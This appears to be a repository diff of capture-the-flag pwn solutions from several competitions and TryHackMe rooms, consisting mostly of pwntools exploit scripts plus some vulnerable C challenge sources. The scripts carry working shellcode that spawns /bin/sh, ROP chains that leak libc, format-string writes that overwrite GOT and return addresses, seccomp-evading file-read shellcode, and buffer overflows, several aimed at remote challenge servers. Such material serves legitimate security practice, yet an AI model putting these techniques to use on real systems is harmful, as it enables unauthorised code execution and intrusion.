context.binary = target = ELF("./challenge", checksec=False)
# r = process()
r = remote("94.72.112.248", 1243)
# funcs
s = lambda a: r.sendline(a)
inc = lambda: r.sendline(b"2")
# read
for i in range(3): s(b"3")
s(b"5")
s(b"6") # 48
inc()
s(b"4")
s(b"3")
s(b"5") # 89
inc()
for i in range(2): s(b"4")
for i in range(2): s(b"3")
for i in range(5): s(b"6")
s(b"5") # d6
inc()
for i in range(3): s(b"3")
s(b"5")
s(b"6") # 48
inc()
for i in range(4): s(b"3")
for i in range(6): s(b"6")
s(b"5") # 31
inc()
for i in range(2): s(b"4")
for i in range(3): s(b"6")
s(b"3")
s(b"5") # d2
inc()
for i in range(2): s(b"4")
for i in range(9): s(b"6")
for i in range(2): s(b"3")
s(b"5") # b2
inc()
for i in range(17): s(b"5") # ff
inc()
s(b"5") # 0f
inc()
for i in range(2): s(b"3")
s(b"5")
for i in range(6): s(b"6") # 05
s(b"7")
# execve
sc = """
lea rdi, [rsi+35]
xor rsi, rsi
xor rdx, rdx
mov rax, 59
syscall
"""
sc = b"\x90"*16 + asm(sc) + b"/bin/sh\0"
s(sc)
r.interactive()
p3rf3ctr00t_ctf_2024/sea_shells/challenge
Executable
BIN
View File
Binary file not shown.
p3rf3ctr00t_ctf_2024/sea_shells/ld-linux-x86-64.so.2
Executable
BIN
View File
Binary file not shown.
p3rf3ctr00t_ctf_2024/sea_shells/libc.so.6
Executable
BIN
View File
Binary file not shown.
random_challs/classic_fmtstring/a.py
+17
View File
@@ -0,0 +1,17 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./fmt", checksec=False)
r = process()
# funcs
s = lambda a: r.sendline(a)
# leak
s(b"%136$p.%137$p")
r.recvuntil(b"Here: ")
out = "".join([unhex(a[2:])[::-1].decode() for a in r.recvlineS().split(".")])
print(out)
r.interactive()
random_challs/classic_fmtstring/fmt
Executable
BIN
View File
Binary file not shown.
random_challs/classroom/a.py
+65
View File
@@ -0,0 +1,65 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./classroom", checksec=False)
libc = target.libc
r = process()
# funcs
s = lambda a: r.sendafter(b"> ", a)
ss = lambda a: r.send(a)
# gadgets
pop_rdi = lambda a: p64(0x400c43) + p64(a)
pop_rsi = lambda a: p64(0x400c41) + p64(a) + p64(0)
# loop
s(b"a")
for i in range(4):
s(b"y")
s(b"a")
s(b"y")
# leak
buf = b"A"*136
buf += pop_rdi(1)
buf += pop_rsi(target.got.write)
buf += p64(target.sym.write)
buf += pop_rdi(0)
buf += pop_rsi(0x60203c)
buf += p64(target.sym.read)
buf += p64(target.sym.kinder)
s(buf)
write = u64(r.recv(6).ljust(8, b"\x00"))
log.info("write: %#x", write)
libc.address = write - libc.sym.write
log.info("libc: %#x", libc.address)
# gadgets
jmp_rsi = libc.address + 0x3acf4
# shellcode
sc = """
lea rdi, [rsp-87]
xor rsi, rsi
xor rdx, rdx
mov rax, 2
syscall
mov rdi, rax
mov rsi, 0x602500
mov dl, 0xff
mov rax, 0
syscall
mov rdi, 1
mov rax, 1
syscall
"""
sc = asm(sc) + b"flag.txt\0"
sc += b"A"*(136-len(sc))
sc += p64(jmp_rsi)
ss(p64(4))
s(b"a")
s(sc)
r.interactive()
random_challs/classroom/classroom
Executable
BIN
View File
Binary file not shown.
random_challs/echoooo/a.py
+69
View File
@@ -0,0 +1,69 @@
#!/usr/bin/python3
from pwn import *
import re
context.binary = target = ELF("./chal", checksec=False)
libc = target.libc
# bruteforce lower 12 bits
def brute():
for a in range(1, 256):
for b in range(8, 256, 16):
r = process(level="error")
partial_ret = (a << 8) | b
write = (0x61 - (partial_ret & 0xff)) & 0xff
buf = b"%c"*16 + f"%{partial_ret-16}c%hn".encode()
buf += f"%{write}c%48$hhn".encode()
r.sendlineafter(b": ", buf)
try:
r.recvuntil(b"Type")
return r, partial_ret
except:
r.kill()
continue
# leak
r, partial_ret = brute()
log.info("ret: %#x", partial_ret)
buf = f"%97c%48$hhn".encode()
buf += b"AAAA%17$p.%19$p"
r.sendlineafter(b": ", buf)
r.recvuntil(b"AAAA")
leaks = re.findall(r'0x[a-z0-9]+', r.recvS())
libc.address = int(leaks[0], 16) - 0x29d68
log.info("libc: %#x", libc.address)
target.address = int(leaks[1], 16) - 0x1169
log.info("elf: %#x", target.address)
# write
partial_ret = int(hex(libc.sym.system)[-4:], 16)
buf = f"%{partial_ret}c%12$hn".encode().ljust(16, b"A") + b"%110c%48$hhn".ljust(16, b"A") + p64(target.got.printf)
r.sendline(buf)
r.sendline(b"/bin/sh")
r.interactive()
"""
# write
partial_ret = 0xe068
write = (0x61 - (partial_ret & 0xff)) & 0xff
buf = b"%c"*16 + f"%{partial_ret-16}c%hn".encode()
buf += f'%{write}c%48$hhn'.encode()
s(buf)
# leak
buf = f"%97c%48$hhn".encode()
buf += b"AAAA%17$p.%19$p"
s(buf)
r.recvuntil(b"AAAA")
leaks = re.findall(r'0x[a-z0-9]+', r.recvS())
libc.address = int(leaks[0], 16) - 0x29d68
target.address = int(leaks[1], 16) - 0x1169
log.info("elf: %#x", target.address)
# write
partial_ret = 0x38f0
buf = f"%{partial_ret}c%12$hn".encode().ljust(16, b"A") + b"%110c%48$hhn".ljust(16, b"A") + p64(target.got.printf)
r.sendline(buf)
"""
random_challs/echoooo/chal
Executable
BIN
View File
Binary file not shown.
random_challs/hide/a.py
+14
View File
@@ -0,0 +1,14 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./hide", checksec=False)
r = process()
# funcs
s = lambda a: r.sendline(a)
# buf
s(b"%160c%hhn%6$s")
r.interactive()
random_challs/hide/hide
Executable
BIN
View File
Binary file not shown.
random_challs/jmp_to_win/a.py
+21
View File
@@ -0,0 +1,21 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./vuln", checksec=False)
r = process()
# funcs
s = lambda a: r.sendlineafter(b":", a)
# leak
s(b"%23$p")
main = int(r.recvline(), 16)
log.info("main: %#x", main)
win = main - 0x96
log.info("win: %#x", win)
# jmp
s(str(hex(win)).encode())
r.interactive()
random_challs/jmp_to_win/source.c
+56
View File
@@ -0,0 +1,56 @@
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
void segfault_handler() {
printf("Segfault Occurred, incorrect address.\n");
exit(0);
}
void call_functions() {
char buffer[64];
printf("Enter your name:");
fgets(buffer, 64, stdin);
printf(buffer);
unsigned long val;
printf(" enter the address to jump to, ex => 0x12345: ");
scanf("%lx", &val);
void (*foo)(void) = (void (*)())val;
foo();
}
int win() {
FILE *fptr;
char c;
printf("You won!\n");
// Open file
fptr = fopen("flag.txt", "r");
if (fptr == NULL)
{
printf("Cannot open file.\n");
exit(0);
}
// Read contents from file
c = fgetc(fptr);
while (c != EOF)
{
printf ("%c", c);
c = fgetc(fptr);
}
printf("\n");
fclose(fptr);
}
int main() {
signal(SIGSEGV, segfault_handler);
setvbuf(stdout, NULL, _IONBF, 0); // _IONBF = Unbuffered
call_functions();
return 0;
}
random_challs/jmp_to_win/vuln
Executable
BIN
View File
Binary file not shown.
random_challs/mad_seccomp/a.py
+40
View File
@@ -0,0 +1,40 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./mad_seccomp", checksec=False)
r = process()
# funcs
s = lambda a: r.send(a)
# shellcode
sc = """
lea rsi, [rax+108]
lea rdx, [rax+200]
mov QWORD PTR [rdx], 2
mov QWORD PTR [rdx+16], 16
mov rax, 437
mov rdi, -100
mov r10, 24
syscall
mov rdi, rax
mov al, 17
lea rsi, [rdx+100]
mov rdx, 100
sub r10b, r10b
syscall
lea r11, [rsi]
mov QWORD PTR [rsi+100], r11
mov QWORD PTR [rsi+108], rax
mov rdi, 1
lea rsi, [rsi+100]
mov rdx, 1
mov rax, 20
syscall
"""
sc = asm(sc)
sc += b"flag.txt\0"
s(sc)
r.interactive()
random_challs/mad_seccomp/mad_seccomp
Executable
BIN
View File
Binary file not shown.
random_challs/mad_seccomp/read_file.c
+44
View File
@@ -0,0 +1,44 @@
#include <sys/syscall.h>
#include <stdio.h>
#include <linux/openat2.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
int main(void){
// get syscall num
printf("openat2: %d\n", SYS_openat2);
printf("pread64: %d\n", SYS_pread64);
printf("writev: %d\n", SYS_writev);
// struct
struct open_how how;
memset(&how, 0, sizeof(how));
how.flags = O_RDWR;
how.resolve = RESOLVE_IN_ROOT;
size_t size = sizeof(how);
// openat2
const char *file = "flag.txt";
long rax = syscall(SYS_openat2, AT_FDCWD, file, &how, size);
printf("fd: %d\n", rax);
// pread64
char buf[64];
long rax2 = syscall(SYS_pread64, rax, buf, 100, 0);
printf("string size: %d\n", rax2);
// struct
char *str = "Some string here";
struct iovec {
void *iov_base;
size_t iov_len;
};
struct iovec iov[1];
iov[0].iov_base = str;
iov[0].iov_len = strlen(str);
// writev
syscall(SYS_writev, 1, iov, 1);
return 0;
}
random_challs/namelen/a.py
+17
View File
@@ -0,0 +1,17 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./namelen", checksec=False)
r = process()
# funcs
s = lambda a: r.sendline(a)
# buf
buf = b"A"*7
buf += b"i"
buf += b"A"*(20-len(buf))
s(buf)
r.interactive()
random_challs/namelen/namelen
Executable
BIN
View File
Binary file not shown.
random_challs/shellcodeburr/a.py
+23
View File
@@ -0,0 +1,23 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./chall", checksec=False)
r = process()
# funcs
s = lambda a: r.sendline(a)
# leak
r.recvuntil(b": ")
stack_addr = int(r.recvline(), 16)
log.info("stack_addr: %#x", stack_addr)
# buf
sc = asm(shellcraft.sh())
sc += b"\x90"*(88-len(sc))
buf = sc
buf += p64(stack_addr)
s(buf)
r.interactive()
random_challs/shellcodeburr/chall
Executable
BIN
View File
Binary file not shown.
random_challs/shellhard/a.py
+38
View File
@@ -0,0 +1,38 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./shellhard", checksec=False)
r = process()
# funcs
s = lambda a: r.sendlineafter(b": ", a)
# stage 1
sc = """
mov rsi, rdx
cqo
mov dl, 0xff
syscall
"""
sc = asm(sc)
s(sc)
# stage 2
sc = """
lea rsi, [rcx+48]
mov edi, -100
xor rdx, rdx
xor r10, r10
mov rax, 257
syscall
mov rsi, rax
mov rdi, 1
add r10b, 0xff
mov rax, 40
syscall
"""
sc = b"\x90"*10 + asm(sc) + b"flag.txt\0"
s(sc)
r.interactive()
random_challs/shellhard/shellhard
Executable
BIN
View File
Binary file not shown.
random_challs/valley/a.py
+27
View File
@@ -0,0 +1,27 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./valley", checksec=False)
r = process()
# funcs
s = lambda a: r.sendlineafter(b": ", a)
ss = lambda a: r.sendline(a)
# leak
s(b"%20$p.%21$p")
r.recvuntil(b": ")
leaks = r.recvlineS().split(".")
stack_addr = int(leaks[0], 16) - 0x8
log.info("stack_addr: %#x", stack_addr)
print_flag = int(leaks[1], 16) - 0x1aa
log.info("print_flag: %#x", print_flag)
write_bytes = int(str(hex(print_flag))[-4:], 16)
fs = f"%{write_bytes}x%8$hnAAAA".encode()
# write
ss(fs+p64(stack_addr))
ss(b"exit")
r.interactive()
random_challs/valley/source.c
+49
View File
@@ -0,0 +1,49 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void print_flag() {
char buf[32];
FILE *file = fopen("/home/valley/flag.txt", "r");
if (file == NULL) {
perror("Failed to open flag file");
exit(EXIT_FAILURE);
}
fgets(buf, sizeof(buf), file);
printf("Congrats! Here is your flag: %s", buf);
fclose(file);
exit(EXIT_SUCCESS);
}
void echo_valley() {
printf("Welcome to the Echo Valley, Try Shouting: \n");
char buf[100];
while(1)
{
fflush(stdout);
if (fgets(buf, sizeof(buf), stdin) == NULL) {
printf("\nEOF detected. Exiting...\n");
exit(0);
}
if (strcmp(buf, "exit\n") == 0) {
printf("The Valley Disappears\n");
break;
}
printf("You heard in the distance: ");
printf(buf);
fflush(stdout);
}
fflush(stdout);
}
int main()
{
echo_valley();
return 0;
}
random_challs/valley/valley
Executable
BIN
View File
Binary file not shown.
random_challs/voidexec/a.py
+27
View File
@@ -0,0 +1,27 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./voidexec", checksec=False)
libc = target.libc
r = process()
# funcs
s = lambda a: r.send(a)
# shellcode
sc = f"""
xor rsi, rsi
xor rdx, rdx
mov r9, [rsp+32]
sub r9, {libc.sym.__libc_start_call_main+128}
mov rdi, r9
add rdi, {next(libc.search(b"/bin/sh\0"))}
mov r15, r9
add r15, {libc.sym.execve}
call r15
"""
sc = asm(sc)
s(sc)
r.interactive()
random_challs/voidexec/ld-linux-x86-64.so.2
Executable
BIN
View File
Binary file not shown.
random_challs/voidexec/libc.so.6
Executable
BIN
View File
Binary file not shown.
random_challs/voidexec/voidexec
Executable
BIN
View File
Binary file not shown.
spookyctf2024/boofer/B00fer
Executable
BIN
View File
Binary file not shown.
spookyctf2024/boofer/a.py
+17
View File
@@ -0,0 +1,17 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./B00fer", checksec=False)
# r = process()
r = remote("b00fer.niccgetsspooky.xyz", 9001)
# funcs
s = lambda a: r.sendline(a)
# buf
buf = b"A"*40
buf += p64(0x401227)
s(buf)
r.interactive()
thm_pwn101/pwn101/a.py
+17
View File
@@ -0,0 +1,17 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./pwn101", checksec=False)
# r = process()
r = remote("10.10.110.117", 9001)
# funcs
s = lambda a: r.sendlineafter(b":", a)
# buf
buf = b"A"*60
buf += p32(0x1337)
s(buf)
r.interactive()

Some files were not shown because too many files have changed in this diff Show More